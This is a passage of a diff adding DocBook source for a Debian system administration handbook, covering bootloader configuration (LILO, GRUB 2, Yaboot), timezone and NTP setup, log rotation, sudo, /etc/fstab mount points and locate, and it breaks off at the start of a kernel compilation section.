+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0 -&gt; ../../sdc
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part1 -&gt; ../../sdc1
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part2 -&gt; ../../sdc2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 wwn-0x5000c50015c4842f -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 wwn-0x5000c50015c4842f-part1 -&gt; ../../sda1
+[...]
+mirexpress:/dev/disk/by-id# </computeroutput></screen>
+
+      <para>Note that some disks are listed several times (because they
+      behave simultaneously as ATA disks and SCSI disks), but the relevant
+      information is mainly in the model and serial numbers of the disks,
+      from which you can find the peripheral file.</para>
+
+      <para>The example configuration files given in the following sections
+      are based on the same setup: a single SATA disk, where the
+      first partition is an old Windows installation and the second
+      contains Debian GNU/Linux.</para>
+    </section>
+    
+    <section id="sect.config-lilo">
+      <title>Configuring LILO</title>
+      <indexterm><primary>LILO</primary></indexterm>
+      <indexterm><primary>Linux Loader</primary></indexterm>
+
+      <para><emphasis>LILO</emphasis> (LInux LOader) is the oldest
+      bootloader — solid but rustic. It writes the physical address of
+      the kernel to boot on the MBR, which is why each update to LILO (or
+      its configuration file) must be followed by the command
+      <command>lilo</command>. Forgetting to do so will render a system
+      unable to boot if the old kernel was removed or replaced as the new
+      one will not be in the same location on the disk.</para>
+
+      <para>LILO's configuration file is
+      <filename>/etc/lilo.conf</filename>; a simple file for standard
+      configuration is illustrated in the example below.</para>
+
+      <example id="example.lilo.conf">
+        <title>LILO configuration file</title>
+
+        <programlisting>
+# The disk on which LILO should be installed.
+# By indicating the disk and not a partition.
+# you order LILO to be installed on the MBR.
+boot=/dev/sda
+# the partition that contains Debian
+root=/dev/sda2
+# the item to be loaded by default
+default=Linux
+
+# the most recent kernel image
+image=/vmlinuz
+  label=Linux
+  initrd=/initrd.img
+  read-only
+
+# Old kernel (if the newly installed kernel doesn't boot)
+image=/vmlinuz.old
+  label=LinuxOLD
+  initrd=/initrd.img.old
+  read-only
+  optional
+
+# only for Linux/Windows dual boot
+other=/dev/sda1
+  label=Windows
+</programlisting>
+      </example>
+    </section>
+    <section id="sect.config-grub">
+      <title>GRUB 2 Configuration</title>
+      <indexterm><primary>GRUB</primary></indexterm>
+      <indexterm><primary>GRUB 2</primary></indexterm>
+
+      <para><emphasis>GRUB</emphasis> (GRand Unified Bootloader) is more
+      recent. It is not necessary to invoke it after each update of the
+      kernel; <emphasis>GRUB</emphasis> knows how to read the filesystems
+      and find the position of the kernel on the disk by itself. To install
+      it on the MBR of the first disk, simply type <command>grub-install
+      /dev/sda</command>.
+      <indexterm><primary><command>grub-install</command></primary></indexterm></para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Disk names for GRUB</title>
+
+	<para>GRUB can only identify hard drives based on information
+	provided by the BIOS. <literal>(hd0)</literal> corresponds to
+	the first disk thus detected, <literal>(hd1)</literal> the
+	second, etc.  In most cases, this order corresponds exactly to
+	the usual order of disks under Linux, but problems can occur
+	when you associate SCSI and IDE disks. GRUB stores
+	correspondences that it detects in the file
+	<filename>/boot/grub/device.map</filename>. If you find errors
+	there (because you know that your BIOS detects drives in a
+	different order), correct them manually and run
+	<command>grub-install</command> again.
+	<command>grub-mkdevicemap</command> can help creating a
+	<filename>device.map</filename> file from which to
+	start.</para>
+
+	<para>Partitions also have a specific name in GRUB. When you use
+	“classical” partitions in MS-DOS format, the first partition on
+	the first disk is labeled, <literal>(hd0,msdos1)</literal>, the
+	second <literal>(hd0,msdos2)</literal>, etc.</para>
+      </sidebar>
+
+      <para>GRUB 2 configuration is stored in
+      <filename>/boot/grub/grub.cfg</filename>, but this file (in Debian)
+      is generated from others. Be careful not to modify it by hand, since
+      such local modifications will be lost the next time
+      <command>update-grub</command> is run (which may occur upon update of
+      various packages). The most common modifications of the
+      <filename>/boot/grub/grub.cfg</filename> file (to add command line
+      parameters to the kernel or change the duration that the menu is
+      displayed, for example) are made through the variables in
+      <filename>/etc/default/grub</filename>. To add entries to the menu,
+      you can either create a <filename>/boot/grub/custom.cfg</filename>
+      file or modify the <filename>/etc/grub.d/40_custom</filename> file.
+      For more complex configurations, you can modify other files in
+      <filename>/etc/grub.d</filename>, or add to them; these scripts
+      should return configuration snippets, possibly by making use of
+      external programs. These scripts are the ones that will update the
+      list of kernels to boot: <filename>10_linux</filename> takes into
+      consideration the installed Linux kernels;
+      <filename>20_linux_xen</filename> takes into account Xen virtual systems,
+      and <filename>30_os-prober</filename> lists other operating systems
+      (Windows, OS X, Hurd).</para>
+    </section>
+    
+    <section id="sect.config-yaboot">
+      <title>For Macintosh Computers (PowerPC): Configuring Yaboot</title>
+      <indexterm><primary><command>yaboot</command></primary></indexterm>
+
+      <para>Yaboot is the bootloader used by old Macintosh computers using
+      PowerPC processors. They do not boot like PCs, but rely on a
+      “bootstrap” partition, from which the BIOS (or OpenFirmware)
+      executes the loader, and on which the <command>ybin</command> program
+      installs <command>yaboot</command> and its configuration file. You
+      will only need to run this command again if the
+      <filename>/etc/yaboot.conf</filename> is modified (it is duplicated
+      on the bootstrap partition, and <command>yaboot</command> knows how
+      to find the position of the kernels on the disks).</para>
+
+      <para>Before executing <command>ybin</command>, you must first have a
+      valid <filename>/etc/yaboot.conf</filename>. The following is an
+      example of a minimal configuration.
+      <indexterm><primary><command>ybin</command></primary></indexterm></para>
+
+      <example id="example.yaboot.conf">
+        <title>Yaboot configuration file</title>
+
+        <programlisting>
+# bootstrap partition
+boot=/dev/sda2
+# the disk
+device=hd:
+# the Linux partition
+partition=3
+root=/dev/sda3
+# boot after 3 seconds of inactivity
+# (timeout is in tenths of seconds)
+timeout=30
+
+install=/usr/lib/yaboot/yaboot
+magicboot=/usr/lib/yaboot/ofboot
+enablecdboot
+
+# last kernel installed
+image=/vmlinux
+        label=linux
+        initrd=/initrd.img
+        read-only
+
+# old kernel
+image=/vmlinux.old
+        label=old
+        initrd=/initrd.img.old
+        read-only
+
+# only for Linux/Mac OSX dual-boot
+macosx=/dev/sda5
+
+# bsd=/dev/sdaX and macos=/dev/sdaX
+# are also possible
+</programlisting>
+      </example>
+    </section>
+  </section>
+  <section id="sect.config-misc">
+    <title>Other Configurations: Time Synchronization, Logs, Sharing Access…</title>
+
+    <para>The many elements listed in this section are good to know for
+    anyone who wants to master all aspects of configuration of the
+    GNU/Linux system. They are, however, treated briefly and frequently
+    refer to the documentation.</para>
+
+    <section id="sect.timezone">
+      <title>Timezone</title>
+      <indexterm><primary>timezone</primary></indexterm>
+
+      <sidebar id="sidebar.symbolic-link">
+        <title><emphasis>BACK TO BASICS</emphasis> Symbolic links</title>
+        <indexterm><primary>link</primary><secondary>symbolic</secondary></indexterm>
+        <indexterm><primary>symbolic link</primary></indexterm>
+        <indexterm><primary><command>ln</command></primary></indexterm>
+
+	<para>A symbolic link is a pointer to another file. When you access
+	it, the file to which it points is opened. Removal of the link will
+	not cause deletion of the file to which it points. Likewise, it
+	does not have its own set of permissions, but rather retains the
+	permissions of its target. Finally, it can point to any type of
+	file: directories, special files (sockets, named pipes, device
+	files, etc.), even other symbolic links.</para>
+
+	<para>The <command>ln -s <replaceable>target</replaceable>
+	<replaceable>link-name</replaceable></command> command creates a
+	symbolic link, named <replaceable>link-name</replaceable>, pointing
+	to <replaceable>target</replaceable>.</para>
+
+	<para>If the target does not exist, then the link is “broken”
+	and accessing it will result in an error indicating that the target
+	file does not exist. If the link points to another link, you will
+	have a “chain” of links that turns into a “cycle” if one of
+	the targets points to one of its predecessors. In this case,
+	accessing one of the links in the cycle will result in a specific
+	error (“too many levels of symbolic links”); this means the
+	kernel gave up after several rounds of the cycle.</para>
+      </sidebar>
+
+      <para>The timezone, configured during initial installation, is a
+      configuration item for the <emphasis role="pkg">tzdata</emphasis>
+      package. To modify it, use the <command>dpkg-reconfigure
+      tzdata</command> command, which allows you to choose the timezone to
+      be used in an interactive manner. Its configuration is stored in the
+      <filename>/etc/timezone</filename> file. Additionally, the
+      corresponding file in the <filename>/usr/share/zoneinfo</filename>
+      directory is copied into <filename>/etc/localtime</filename>; this file
+      contains the rules governing the dates where daylight saving time is
+      active, for countries that use it.</para>
+      <indexterm><primary><filename>timezone</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/timezone</filename></primary></indexterm>
+      <indexterm><primary><filename>zoneinfo</filename></primary></indexterm>
+      <indexterm><primary><filename>/usr/share/zoneinfo/</filename></primary></indexterm>
+      <indexterm><primary>DST</primary></indexterm>
+      <indexterm><primary>daylight saving time</primary></indexterm>
+
+      <para>When you need to temporarily change the timezone, use the
+      <varname>TZ</varname> environment variable, which takes priority over
+      the configured system default:</para>
+      <indexterm><primary><varname>TZ</varname></primary></indexterm>
+
+      <screen id="screen.tz">
+<computeroutput>$ </computeroutput><userinput>date</userinput>
+<computeroutput>Thu Feb 19 11:25:18 CET 2015</computeroutput>
+<computeroutput>$ </computeroutput><userinput>TZ="Pacific/Honolulu" date</userinput>
+<computeroutput>Thu Feb 19 00:25:21 HST 2015</computeroutput></screen>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> System clock, hardware clock</title>
+
+	<para>There are two time sources in a computer. A computer's
+	motherboard has a hardware clock, called the “CMOS clock”. This
+	clock is not very precise, and provides rather slow access times.
+	The operating system kernel has its own, the software clock, which
+	it keeps up to date with its own means (possibly with the help of
+	time servers, see <xref linkend="sect.time-synchronization" />). This
+	system clock is generally more accurate, especially since it
+	doesn't need access to hardware variables. However, since it only
+	exists in live memory, it is zeroed out every time the machine is
+	booted, contrary to the CMOS clock, which has a battery and
+	therefore “survives” rebooting or halting of the machine. The
+	system clock is, thus, set from the CMOS clock during boot, and the
+	CMOS clock is updated on shutdown (to take into account possible
+	changes or corrections if it has been improperly adjusted).</para>
+
+	<para>In practice, there is a problem, since the CMOS clock is
+	nothing more than a counter and contains no information regarding
+	the time zone. There is a choice to make regarding its
+	interpretation: either the system considers it runs in universal
+	time (UTC, formerly GMT), or in local time. This choice could be a
+	simple shift, but things are actually more complicated: as a result
+	of daylight saving time, this offset is not constant. The result is
+	that the system has no way to determine whether the offset is
+	correct, especially around periods of time change. Since it is
+	always possible to reconstruct local time from universal time and
+	the timezone information, we strongly recommend using the CMOS
+	clock in universal time.</para>
+
+	<para>Unfortunately, Windows systems in their default configuration
+	ignore this recommendation; they keep the CMOS clock on local time,
+	applying time changes when booting the computer by trying to guess
+	during time changes if the change has already been applied or not.
+	This works relatively well, as long as the system has only Windows
+	running on it. But when a computer has several systems (whether it
+	be a “dual-boot” configuration or running other systems via
+	virtual machine), chaos ensues, with no means to determine if the
+	time is correct. If you absolutely must retain Windows on a
+	computer, you should either configure it to keep the CMOS clock as
+	UTC (setting the registry key
+	<literal>HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation\RealTimeIsUniversal</literal>
+	to “1” as a DWORD), or use <command>hwclock --localtime --set</command>
+	on the Debian system to set the hardware clock and mark it as tracking
+	the local time (and make sure to manually check your clock in spring and
+	autumn).</para>
+      </sidebar>
+    </section>
+    <section id="sect.time-synchronization">
+      <title>Time Synchronization</title>
+      <indexterm><primary>time synchronization</primary></indexterm>
+      <indexterm><primary>clock</primary><secondary>synchronization</secondary></indexterm>
+
+      <para>Time synchronization, which may seem superfluous on a computer,
+      is very important on a network. Since users do not have permissions
+      allowing them to modify the date and time, it is important for this
+      information to be precise to prevent confusion. Furthermore, having
+      all of the computers on a network synchronized allows better
+      cross-referencing of information from logs on different machines.
+      Thus, in the event of an attack, it is easier to reconstruct the
+      chronological sequence of actions on the various machines involved in
+      the compromise. Data collected on several machines for statistical
+      purposes won't make a great deal of sense if they are not
+      synchronized.</para>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> NTP</title>
+        <indexterm><primary>NTP</primary></indexterm>
+        <indexterm><primary>Network</primary><secondary>Time Protocol</secondary></indexterm>
+
+	<para>NTP (Network Time Protocol) allows a machine to synchronize
+	with others fairly accurately, taking into consideration the delays
+	induced by the transfer of information over the network and other
+	possible offsets.</para>
+
+	<para>While there are numerous NTP servers on the Internet, the
+	more popular ones may be overloaded. This is why we recommend using
+	the <emphasis>pool.ntp.org</emphasis> NTP server, which is, in
+	reality, a group of machines that have agreed to serve as public
+	NTP servers. You could even limit use to a sub-group specific to a
+	country, with, for example, <emphasis>us.pool.ntp.org</emphasis>
+	for the United States, or <emphasis>ca.pool.ntp.org</emphasis> for
+	Canada, etc.</para>
+
+	<para>However, if you manage a large network, it is recommended
+	that you install your own NTP server, which will synchronize with
+	the public servers. In this case, all the other machines on your
+	network can use your internal NTP server instead of increasing the
+	load on the public servers. You will also increase homogeneity with
+	your clocks, since all the machines will be synchronized on the
+	same source, and this source is very close in terms of network
+	transfer times.</para>
+      </sidebar>
+      <section id="sect.ntp-on-workstations">
+        <title>For Workstations</title>
+
+	<para>Since work stations are regularly rebooted (even if only to
+	save energy), synchronizing them by NTP at boot is enough. To do
+	so, simply install the <emphasis role="pkg">ntpdate</emphasis>
+	package. You can change the NTP server used if needed by modifying
+	the <filename>/etc/default/ntpdate</filename> file.</para>
+        <indexterm><primary><filename>ntpdate</filename></primary></indexterm>
+        <indexterm><primary><filename>/etc/default/ntpdate</filename></primary></indexterm>
+      </section>
+      <section id="sect.ntp-on-servers">
+        <title>For Servers</title>
+
+        
+	<para>Servers are only rarely rebooted, and it is very important
+	for their system time to be correct. To permanently maintain
+	correct time, you would install a local NTP server, a service
+	offered in the <emphasis role="pkg">ntp</emphasis> package. In its
+	default configuration, the server will synchronize with
+	<emphasis>pool.ntp.org</emphasis> and provide time in response to
+	requests coming from the local network. You can configure it by
+	editing the <filename>/etc/ntp.conf</filename> file, the most
+	significant alteration being the NTP server to which it refers. If
+	the network has a lot of servers, it may be interesting to have one
+	local time server which synchronizes with the public servers and is
+	used as a time source by the other servers of the network.</para>
+        <indexterm><primary><emphasis role="pkg">ntp</emphasis></primary></indexterm>
+        <indexterm><primary>server</primary><secondary>NTP</secondary></indexterm>
+        <indexterm><primary>NTP</primary><secondary>server</secondary></indexterm>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> GPS modules and other time sources</title>
+          <indexterm><primary>GPS</primary></indexterm>
+          <indexterm><primary>DCF-77</primary></indexterm>
+
+	  <para>If time synchronization is particularly crucial to your
+	  network, it is possible to equip a server with a GPS module
+	  (which will use the time from GPS satellites) or a DCF-77 module
+	  (which will sync time with the atomic clock near Frankfurt,
+	  Germany). In this case, the configuration of the NTP server is a
+	  little more complicated, and prior consultation of the
+	  documentation is an absolute necessity.</para>
+        </sidebar>
+      </section>
+    </section>
+    <section id="sect.rotation-logs">
+      <title>Rotating Log Files</title>
+      <indexterm><primary>file</primary><secondary>logs, rotation</secondary></indexterm>
+      <indexterm><primary>logs</primary><secondary>files, rotation</secondary></indexterm>
+      <indexterm><primary>rotation of log files</primary></indexterm>
+      <indexterm><primary><command>logrotate</command></primary></indexterm>
+
+      <para>Log files can grow, fast, and it is necessary to archive them.
+      The most common scheme is a rotating archive: the log file is
+      regularly archived, and only the latest <replaceable>X</replaceable>
+      archives are retained. <command>logrotate</command>, the program
+      responsible for these rotations, follows directives given in the
+      <filename>/etc/logrotate.conf</filename> file and all of the files in
+      the <filename>/etc/logrotate.d/</filename> directory. The
+      administrator may modify these files, if they wish to adapt the log
+      rotation policy defined by Debian. The
+      <citerefentry><refentrytitle>logrotate</refentrytitle>
+      <manvolnum>1</manvolnum></citerefentry> man page describes all of the
+      options available in these configuration files. You may want to
+      increase the number of files retained in log rotation, or move the
+      log files to a specific directory dedicated to archiving them rather
+      than delete them. You could also send them by e-mail to archive them
+      elsewhere.</para>
+
+      <para>The <command>logrotate</command> program is executed daily by
+      the <command>cron</command> scheduling program (described in <xref linkend="sect.task-scheduling-cron-atd" />).</para>
+    </section>
+    <section id="sect.sharing-admin-rights">
+      <title>Sharing Administrator Rights</title>
+      <indexterm><primary>account</primary><secondary>administrator account</secondary></indexterm>
+      <indexterm><primary>root</primary></indexterm>
+      <indexterm><primary><command>sudo</command></primary></indexterm>
+
+      <para>Frequently, several administrators work on the same network.
+      Sharing the root passwords is not very elegant, and opens the
+      door for abuse due to the anonymity such sharing creates. The
+      solution to this problem is the <command>sudo</command> program,
+      which allows certain users to execute certain commands with special
+      rights. In the most common use case, <command>sudo</command> allows a
+      trusted user to execute any command as root. To do so, the user
+      simply executes <command>sudo
+      <replaceable>command</replaceable></command> and authenticates using
+      their personal password.</para>
+
+      <para>When installed, the <emphasis role="pkg">sudo</emphasis>
+      package gives full root rights to members of the
+      <literal>sudo</literal> Unix group. To delegate other rights, the
+      administrator must use the <command>visudo</command> command, which
+      allows them to modify the <filename>/etc/sudoers</filename>
+      configuration file (here again, this will invoke the
+      <command>vi</command> editor, or any other editor indicated in the
+      <varname>EDITOR</varname> environment variable). Adding a line with
+      <literal><replaceable>username</replaceable> ALL=(ALL) ALL</literal>
+      allows the user in question to execute any command as root.</para>
+      <indexterm><primary><command>visudo</command></primary></indexterm>
+      <indexterm><primary><filename>sudoers</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/sudoers</filename></primary></indexterm>
+
+      <para>More sophisticated configurations allow authorization of only
+      specific commands to specific users. All the details of the various
+      possibilities are given in the
+      <citerefentry><refentrytitle>sudoers</refentrytitle>
+      <manvolnum>5</manvolnum></citerefentry> man page.</para>
+    </section>
+    <section id="sect.fstab-mount-points">
+      <title>List of Mount Points</title>
+      <indexterm><primary>point, mount</primary></indexterm>
+      <indexterm><primary>mount point</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Mounting and unmounting</title>
+
+	<para>In a Unix-like system such as Debian, files are organized in
+	a single tree-like hierarchy of directories. The
+	<filename>/</filename> directory is called the “root
+	directory”; all additional directories are sub-directories within
+	this root. “Mounting” is the action of including the content of
+	a peripheral device (often a hard drive) into the system's general
+	file tree. As a consequence, if you use a separate hard drive to
+	store users' personal data, this disk will have to be “mounted”
+	in the <filename>/home/</filename> directory. The root filesystem
+	is always mounted at boot by the kernel; other devices are often
+	mounted later during the startup sequence or manually with the
+	<command>mount</command> command.</para>
+        <indexterm><primary><command>mount</command></primary></indexterm>
+
+	<para>Some removable devices are automatically mounted when
+	connected, especially when using the GNOME, Plasma or other graphical
+	desktop environments. Others have to be mounted manually by the
+	user. Likewise, they must be unmounted (removed from the file
+	tree). Normal users do not usually have permission to execute the
+	<command>mount</command> and <command>umount</command> commands.
+	The administrator can, however, authorize these operations
+	(independently for each mount point) by including the
+	<literal>user</literal> option in the
+	<filename>/etc/fstab</filename> file.</para>
+
+	<para>The <command>mount</command> command can be used without
+	arguments (it then lists all mounted filesystems). The following
+	parameters are required to mount or unmount a device. For the
+	complete list, please refer to the corresponding man pages,
+	<citerefentry><refentrytitle>mount</refentrytitle>
+	<manvolnum>8</manvolnum></citerefentry> and
+	<citerefentry><refentrytitle>umount</refentrytitle>
+	<manvolnum>8</manvolnum></citerefentry>. For simple cases, the
+	syntax is simple too: for example, to mount the
+	<filename>/dev/sdc1</filename> partition, which has an ext3
+	filesystem, into the <filename>/mnt/tmp/</filename> directory, you
+	would simply run <command>mount -t ext3 /dev/sdc1
+	/mnt/tmp/</command>.</para>
+      </sidebar>
+
+      <para>The <filename>/etc/fstab</filename> file gives a list of all
+      possible mounts that happen either automatically on boot or manually
+      for removable storage devices. Each mount point is described by a
+      line with several space-separated fields:
+      <indexterm><primary><filename>fstab</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/fstab</filename></primary></indexterm></para>
+      <itemizedlist>
+        <listitem>
+          <para>file system: this indicates where the filesystem to be mounted can be found,
+          it can be a local device (hard drive partition,
+	  CD-ROM) or a remote filesystem (such as NFS).</para>
+
+	  <para>This field is frequently replaced with the unique ID of the
+	  filesystem (which you can determine with <command>blkid
+	  <userinput>device</userinput></command>) prefixed with
+	  <literal>UUID=</literal>. This guards against a change in the
+	  name of the device in the event of addition or removal of disks,
+	  or if disks are detected in a different order.</para>
+        </listitem>
+        <listitem>
+	  <para>mount point: this is the location on the local filesystem
+	  where the device, remote system, or partition will be
+	  mounted.</para>
+        </listitem>
+        <listitem>
+	  <para>type: this field defines the filesystem used on the mounted
+	  device. <literal>ext4</literal>, <literal>ext3</literal>,
+	  <literal>vfat</literal>, <literal>ntfs</literal>,
+	  <literal>btrfs</literal>, <literal>xfs</literal> are a few
+	  examples.</para>
+
+          <sidebar>
+            <title><emphasis>BACK TO BASICS</emphasis> NFS, a network filesystem</title>
+
+	    <para>NFS is a network filesystem; under Linux, it allows
+	    transparent access to remote files by including them in the
+	    local filesystem.</para>
+          </sidebar>
+
+	  <para>A complete list of known filesystems is available in the
+	  <citerefentry><refentrytitle>mount</refentrytitle>
+	  <manvolnum>8</manvolnum></citerefentry> man page. The
+	  <literal>swap</literal> special value is for swap partitions; the
+	  <literal>auto</literal> special value tells the
+	  <command>mount</command> program to automatically detect the
+	  filesystem (which is especially useful for disk readers and USB
+	  keys, since each one might have a different filesystem);</para>
+        </listitem>
+        <listitem>
+	  <para>options: there are many of them, depending on the
+	  filesystem, and they are documented in the
+	  <command>mount</command> man page. The most common are</para>
+          <itemizedlist>
+            <listitem>
+	      <para><literal>rw</literal> or <literal>ro</literal>,
+	      meaning, respectively, that the device will be mounted with
+	      read/write or read-only permissions.</para>
+            </listitem>
+            <listitem>
+	      <para><literal>noauto</literal> deactivates automatic
+	      mounting on boot.</para>
+            </listitem>
+            <listitem>
+              <para>
+                <literal>nofail</literal> allows the boot to proceed
+                even when the device is not present. Make sure to put this
+                option for external drives that might be unplugged
+                when you boot, because <command>systemd</command> really
+                ensures that all mount points that must be automatically
+                mounted are actually mounted before letting the boot
+                process continue to its end. Note that you can combine
+                this with <literal>x-systemd.device-timeout=5s</literal>
+                to tell <command>systemd</command> to not wait more than
+                5 seconds for the device to appear (see
+                <citerefentry><refentrytitle>systemd.mount</refentrytitle><manvolnum>5</manvolnum></citerefentry>).
+	      </para>
+            </listitem>
+            <listitem>
+	      <para><literal>user</literal> authorizes all users to mount
+	      this filesystem (an operation which would otherwise be
+	      restricted to the root user).</para>
+            </listitem>
+            <listitem>
+	      <para><literal>defaults</literal> means the group of default
+	      options: <literal>rw</literal>, <literal>suid</literal>,
+	      <literal>dev</literal>, <literal>exec</literal>,
+	      <literal>auto</literal>, <literal>nouser</literal> and
+	      <literal>async</literal>, each of which can be individually
+	      disabled after <literal>defaults</literal> by adding
+	      <literal>nosuid</literal>, <literal>nodev</literal> and so on
+	      to block <literal>suid</literal>, <literal>dev</literal> and
+	      so on. Adding the <literal>user</literal> option reactivates
+	      it, since <literal>defaults</literal> includes
+	      <literal>nouser</literal>.</para>
+            </listitem>
+          </itemizedlist>
+        </listitem>
+        <listitem>
+          <para>dump: this field is almost always set to
+	  <literal>0</literal>. When it is <literal>1</literal>, it tells
+	  the <command>dump</command> tool that the partition contains data
+	  that is to be backed up.</para>
+        </listitem>
+        <listitem>
+          <para>pass: this last field indicates whether the
+	  integrity of the filesystem should be checked on boot, and in
+	  which order this check should be executed. If it is
+	  <literal>0</literal>, no check is conducted. The root filesystem
+	  should have the value <literal>1</literal>, while other permanent
+	  filesystems get the value <literal>2</literal>.</para>
+        </listitem>
+      </itemizedlist>
+
+      <example id="example.fstab">
+        <title>Example <filename>/etc/fstab</filename> file</title>
+
+        <programlisting>
+# /etc/fstab: static file system information.
+#
+# &lt;file system&gt; &lt;mount point&gt;   &lt;type&gt;  &lt;options&gt;       &lt;dump&gt;  &lt;pass&gt;
+proc            /proc           proc    defaults        0       0
+# / was on /dev/sda1 during installation
+UUID=c964222e-6af1-4985-be04-19d7c764d0a7 / ext3 errors=remount-ro 0 1
+# swap was on /dev/sda5 during installation
+UUID=ee880013-0f63-4251-b5c6-b771f53bd90e none swap sw  0       0
+/dev/scd0       /media/cdrom0   udf,iso9660 user,noauto 0       0
+/dev/fd0        /media/floppy   auto    rw,user,noauto  0       0
+arrakis:/shared /shared         nfs     defaults        0       0
+</programlisting>
+      </example>
+
+      <para>The last entry in this example corresponds to a network
+      filesystem (NFS): the <filename>/shared/</filename> directory on the
+      <emphasis>arrakis</emphasis> server is mounted at
+      <filename>/shared/</filename> on the local machine. The format of the
+      <filename>/etc/fstab</filename> file is documented on the
+      <citerefentry><refentrytitle>fstab</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+      man page.</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Auto-mounting</title>
+
+        <para>
+          systemd is able to manage automount points: those are filesystems
+          that are mounted on-demand when a user attempts
+          to access their target mount points. It can also unmount these
+          filesystems when no process is accessing them any longer.
+        </para>
+        <para>
+          Like most concepts in systemd, automount points are managed with
+          dedicated units (using the <literal>.automount</literal> suffix).
+          See
+          <citerefentry><refentrytitle>systemd.automount</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+          for their precise syntax.
+        </para>
+
+        <indexterm><primary><emphasis>am-utils</emphasis></primary></indexterm>
+        <indexterm><primary><command>amd</command></primary></indexterm>
+        <indexterm><primary><command>automount</command></primary></indexterm>
+        <indexterm><primary><emphasis>autofs</emphasis></primary></indexterm>
+        <indexterm><primary>automounter</primary></indexterm>
+
+        <para>
+          Other auto-mounting utilities exist, such as
+          <command>automount</command> in the <emphasis role="pkg">autofs</emphasis> package or <command>amd</command>
+          in the <emphasis role="pkg">am-utils</emphasis>.
+        </para>
+
+	<para>Note also that GNOME, Plasma, and other graphical desktop
+	environments work together with <emphasis>udisks</emphasis>,
+	and can automatically mount removable media when they are connected.</para>
+      </sidebar>
+    </section>
+    <section id="sect.locate-updatedb">
+      <title><command>locate</command> and <command>updatedb</command></title>
+      <indexterm><primary><command>locate</command></primary></indexterm>
+      <indexterm><primary><command>updatedb</command></primary></indexterm>
+      <indexterm><primary><command>mlocate</command></primary></indexterm>
+
+      
+      <para>The <command>locate</command> command can find the location of
+      a file when you only know part of the name. It sends a result almost
+      instantaneously, since it consults a database that stores the
+      location of all the files on the system; this database is updated
+      daily by the <command>updatedb</command> command. There are multiple
+      implementations of the <command>locate</command> command and Debian
+      picked <emphasis role="pkg">mlocate</emphasis> for its standard
+      system.</para>
+
+      <para><command>mlocate</command> is smart enough to only return
+      files which are accessible to the user running the command even
+      though it uses a database that knows about all files on the system
+      (since its <command>updatedb</command> implementation runs with
+      root rights). For extra safety, the administrator can use
+      <varname>PRUNEDPATHS</varname> in
+      <filename>/etc/updatedb.conf</filename> to exclude some directories
+      from being indexed.</para>
+    </section>
+  </section>
+  <section id="sect.kernel-compilation">
+    <title>Compiling a Kernel</title>
+    <indexterm><primary>compilation</primary><secondary>of a kernel</secondary></indexterm>
+    <indexterm><primary>kernel</primary><secondary>compilation</secondary></indexterm>
+
+    <para>The kernels provided by Debian include the largest possible
+    number of features, as well as the maximum of drivers, in order to
+    cover the broadest spectrum of existing hardware configurations. This
+    is why some users prefer to recompile the kernel in order to only
+    include what they specifically need. There are two reasons for this
+    choice. First, it may be to optimize memory consumption, since the
+    kernel code, even if it is never used, occupies memory for nothing (and
+    never “goes down” on the swap space, since it is actual RAM that it
+    uses), which can decrease overall system performance. A locally
+    compiled kernel can also limit the risk of security problems since only
+    a fraction of the kernel code is compiled and run.</para>
+
+    <sidebar>
+      <title><emphasis>NOTE</emphasis> Security updates</title>
+
+      <para>If you choose to compile your own kernel, you must accept the
+      consequences: Debian cannot ensure security updates for your custom
+      kernel. By keeping the kernel provided by Debian, you benefit from
+      updates prepared by the Debian Project's security team.</para>
+    </sidebar>
+
+    <para>Recompilation of the kernel is also necessary if you want to use
+    certain features that are only available as patches (and not included
+    in the standard kernel version).</para>
+
+    <sidebar>
+      <title><emphasis>GOING FURTHER</emphasis> The Debian Kernel Handbook</title>
+      <indexterm><primary><emphasis role="pkg">debian-kernel-handbook</emphasis></primary></indexterm>
+
+      <para>The Debian kernel teams maintains the “Debian Kernel Handbook”
